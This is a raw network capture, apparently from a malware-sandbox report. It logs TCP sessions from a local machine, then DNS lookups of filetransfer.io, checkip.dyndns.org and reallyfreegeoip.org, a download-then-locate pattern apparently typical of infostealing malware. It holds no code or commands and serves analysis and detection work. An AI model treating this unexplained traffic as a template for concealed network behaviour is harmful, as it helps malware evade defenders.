                                                              Nov 20, 2024 08:18:14.304501057 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.305198908 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.305216074 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.305253983 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.305260897 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.305284977 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.305293083 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.306898117 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.306936026 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.306958914 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.306965113 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.306987047 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.307005882 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.307516098 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.307537079 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.307565928 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.307575941 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.307605028 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.307614088 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.389729023 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.389755964 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.389822960 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.389841080 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.389873028 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.389892101 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.390541077 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.390558004 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.390594006 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.390602112 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.390626907 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.390644073 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.391218901 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.391236067 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.391268969 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.391273975 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.391305923 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.391323090 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.391998053 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.392015934 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.392052889 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.392062902 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.392086983 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.392103910 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.392978907 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.392993927 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.393027067 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.393034935 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.393063068 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.393081903 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.393898010 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.393913984 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.393968105 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.393978119 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.394016027 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.395669937 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.395685911 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.395726919 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.395734072 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.395762920 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.395777941 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.396156073 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.396174908 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.396208048 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.396214962 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.396240950 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.396265984 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.402355909 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.478147984 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.478172064 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.478266954 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.478283882 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.478329897 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.478753090 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.478770018 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.478825092 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.478833914 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.478873968 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.479392052 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.479410887 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.479444981 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.479451895 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.479477882 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.479496956 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.480227947 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.480243921 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.480281115 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.480289936 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.480314970 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.480331898 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.481142044 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.481157064 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.481189013 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.481198072 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.481221914 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.481245041 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.482105970 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.482127905 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.482192039 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.482203007 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.482213974 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.482235909 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.484076023 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.484121084 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.484133959 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.484141111 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.484169960 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.484184027 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.484755039 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.484772921 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.484807968 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.484817028 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.484839916 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.484913111 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.566907883 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.566926003 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.567054033 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.567086935 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.567131996 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.567827940 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.567843914 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.567895889 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.567909002 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.567939997 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.568712950 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.568728924 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.568789959 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.568800926 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.568835974 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.569390059 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.569406033 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.569442987 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.569470882 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.569479942 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.569504023 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.569518089 CET44349732188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:18:14.569519043 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.569565058 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:14.570139885 CET49732443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:18:59.791924000 CET4973980192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:18:59.797374010 CET8049739193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:18:59.797471046 CET4973980192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:18:59.797810078 CET4973980192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:18:59.802664995 CET8049739193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:00.443377018 CET8049739193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:00.456357002 CET4973980192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:00.461293936 CET8049739193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:00.554006100 CET4973080192.168.2.4188.114.96.3
                                                              Nov 20, 2024 08:19:00.646150112 CET8049739193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:00.694601059 CET4973980192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:00.782234907 CET49740443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:00.782294035 CET44349740188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:00.782378912 CET49740443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:00.788937092 CET49740443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:00.788976908 CET44349740188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:01.256055117 CET44349740188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:01.256139040 CET49740443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:01.269167900 CET49740443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:01.269196033 CET44349740188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:01.269649029 CET44349740188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:01.319593906 CET49740443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:01.363905907 CET49740443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:01.411338091 CET44349740188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:01.692519903 CET44349740188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:01.692574024 CET44349740188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:01.692682028 CET49740443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:01.700674057 CET49740443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:01.704252958 CET4973980192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:01.709122896 CET8049739193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:01.904439926 CET8049739193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:01.906925917 CET49741443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:01.906984091 CET44349741188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:01.907046080 CET49741443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:01.907320976 CET49741443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:01.907331944 CET44349741188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:01.944617033 CET4973980192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:02.390403032 CET44349741188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:02.396405935 CET49741443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:02.396437883 CET44349741188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:02.546015024 CET44349741188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:02.546084881 CET44349741188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:02.546143055 CET49741443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:02.546624899 CET49741443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:02.550307035 CET4973980192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:02.551248074 CET4974280192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:02.555402040 CET8049739193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:02.555457115 CET4973980192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:02.556140900 CET8049742193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:02.556216002 CET4974280192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:02.556323051 CET4974280192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:02.561125994 CET8049742193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:03.202857971 CET8049742193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:03.204513073 CET49744443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:03.204617977 CET44349744188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:03.204720974 CET49744443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:03.204972029 CET49744443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:03.205007076 CET44349744188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:03.257174969 CET4974280192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:03.659141064 CET44349744188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:03.680077076 CET49744443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:03.680100918 CET44349744188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:03.803752899 CET44349744188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:03.803875923 CET44349744188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:03.803970098 CET49744443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:03.804414034 CET49744443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:03.924031019 CET4974280192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:03.929259062 CET8049742193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:03.929332018 CET4974280192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:03.932794094 CET4974580192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:03.937720060 CET8049745193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:03.937808037 CET4974580192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:03.937967062 CET4974580192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:03.942744017 CET8049745193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:04.584526062 CET8049745193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:04.586024046 CET49752443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:04.586082935 CET44349752188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:04.586139917 CET49752443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:04.586493969 CET49752443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:04.586507082 CET44349752188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:04.632112026 CET4974580192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:05.070631981 CET44349752188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:05.074978113 CET49752443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:05.075011015 CET44349752188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:05.225737095 CET44349752188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:05.225799084 CET44349752188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:05.226000071 CET49752443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:05.226744890 CET49752443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:05.230197906 CET4974580192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:05.231379986 CET4975880192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:05.235340118 CET8049745193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:05.236279011 CET8049758193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:05.236325979 CET4974580192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:05.236365080 CET4975880192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:05.236510038 CET4975880192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:05.241338968 CET8049758193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:05.871831894 CET8049758193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:05.873051882 CET49764443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:05.873105049 CET44349764188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:05.873740911 CET49764443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:05.873971939 CET49764443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:05.873985052 CET44349764188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:05.913369894 CET4975880192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:06.328978062 CET44349764188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:06.346251011 CET49764443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:06.346282005 CET44349764188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:06.461148024 CET44349764188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:06.461213112 CET44349764188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:06.461302996 CET49764443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:06.468513966 CET49764443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:06.511665106 CET4975880192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:06.513837099 CET4976580192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:06.516985893 CET8049758193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:06.517095089 CET4975880192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:06.518923998 CET8049765193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:06.518989086 CET4976580192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:06.519090891 CET4976580192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:06.523998976 CET8049765193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:07.151909113 CET8049765193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:07.153388023 CET49770443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:07.153441906 CET44349770188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:07.153512955 CET49770443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:07.153789997 CET49770443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:07.153800964 CET44349770188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:07.194700956 CET4976580192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:07.617959023 CET44349770188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:07.627974033 CET49770443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:07.628021002 CET44349770188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:07.758162022 CET44349770188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:07.758333921 CET44349770188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:07.759762049 CET49770443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:07.760052919 CET49770443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:07.765127897 CET4976580192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:07.767396927 CET4977580192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:07.771168947 CET8049765193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:07.772418022 CET4976580192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:07.773068905 CET8049775193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:07.775501966 CET4977580192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:07.775638103 CET4977580192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:07.780436993 CET8049775193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:08.403659105 CET8049775193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:08.404964924 CET49780443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:08.405038118 CET44349780188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:08.405107021 CET49780443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:08.405402899 CET49780443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:08.405422926 CET44349780188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:08.444613934 CET4977580192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:08.994033098 CET44349780188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:09.017405987 CET49780443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:09.017447948 CET44349780188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:09.127985954 CET44349780188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:09.128051043 CET44349780188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:09.128092051 CET49780443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:09.142179966 CET49780443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:09.238197088 CET4977580192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:09.239567995 CET4978180192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:09.243966103 CET8049775193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:09.244035006 CET4977580192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:09.244700909 CET8049781193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:09.244772911 CET4978180192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:09.244904995 CET4978180192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:09.249830961 CET8049781193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:09.870517015 CET8049781193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:19:09.871994972 CET49787443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:09.872025013 CET44349787188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:09.872081995 CET49787443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:09.872371912 CET49787443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:09.872387886 CET44349787188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:09.913363934 CET4978180192.168.2.4193.122.6.168
                                                              Nov 20, 2024 08:19:10.330900908 CET44349787188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:10.332206964 CET49787443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:10.332238913 CET44349787188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:10.479935884 CET44349787188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:10.480005026 CET44349787188.114.97.3192.168.2.4
                                                              Nov 20, 2024 08:19:10.480066061 CET49787443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:19:10.480535984 CET49787443192.168.2.4188.114.97.3
                                                              Nov 20, 2024 08:20:14.870965004 CET8049781193.122.6.168192.168.2.4
                                                              Nov 20, 2024 08:20:14.871052027 CET4978180192.168.2.4193.122.6.168

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Nov 20, 2024 08:18:10.155082941 CET5001953192.168.2.41.1.1.1
                                                              Nov 20, 2024 08:18:10.163335085 CET53500191.1.1.1192.168.2.4
                                                              Nov 20, 2024 08:18:12.423330069 CET6474953192.168.2.41.1.1.1
                                                              Nov 20, 2024 08:18:12.431993008 CET53647491.1.1.1192.168.2.4
                                                              Nov 20, 2024 08:18:59.744580030 CET6368653192.168.2.41.1.1.1
                                                              Nov 20, 2024 08:18:59.780251980 CET53636861.1.1.1192.168.2.4
                                                              Nov 20, 2024 08:19:00.774436951 CET5218453192.168.2.41.1.1.1
                                                              Nov 20, 2024 08:19:00.781559944 CET53521841.1.1.1192.168.2.4

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Nov 20, 2024 08:18:10.155082941 CET192.168.2.41.1.1.10x3ca7Standard query (0)filetransfer.ioA (IP address)IN (0x0001)false
                                                              Nov 20, 2024 08:18:12.423330069 CET192.168.2.41.1.1.10xff6cStandard query (0)s24.filetransfer.ioA (IP address)IN (0x0001)false
                                                              Nov 20, 2024 08:18:59.744580030 CET192.168.2.41.1.1.10xc59cStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                              Nov 20, 2024 08:19:00.774436951 CET192.168.2.41.1.1.10x1e2bStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Nov 20, 2024 08:18:10.163335085 CET1.1.1.1192.168.2.40x3ca7No error (0)filetransfer.io188.114.96.3A (IP address)IN (0x0001)false
                                                              Nov 20, 2024 08:18:10.163335085 CET1.1.1.1192.168.2.40x3ca7No error (0)filetransfer.io188.114.97.3A (IP address)IN (0x0001)false
                                                              Nov 20, 2024 08:18:12.431993008 CET1.1.1.1192.168.2.40xff6cNo error (0)s24.filetransfer.io188.114.97.3A (IP address)IN (0x0001)false
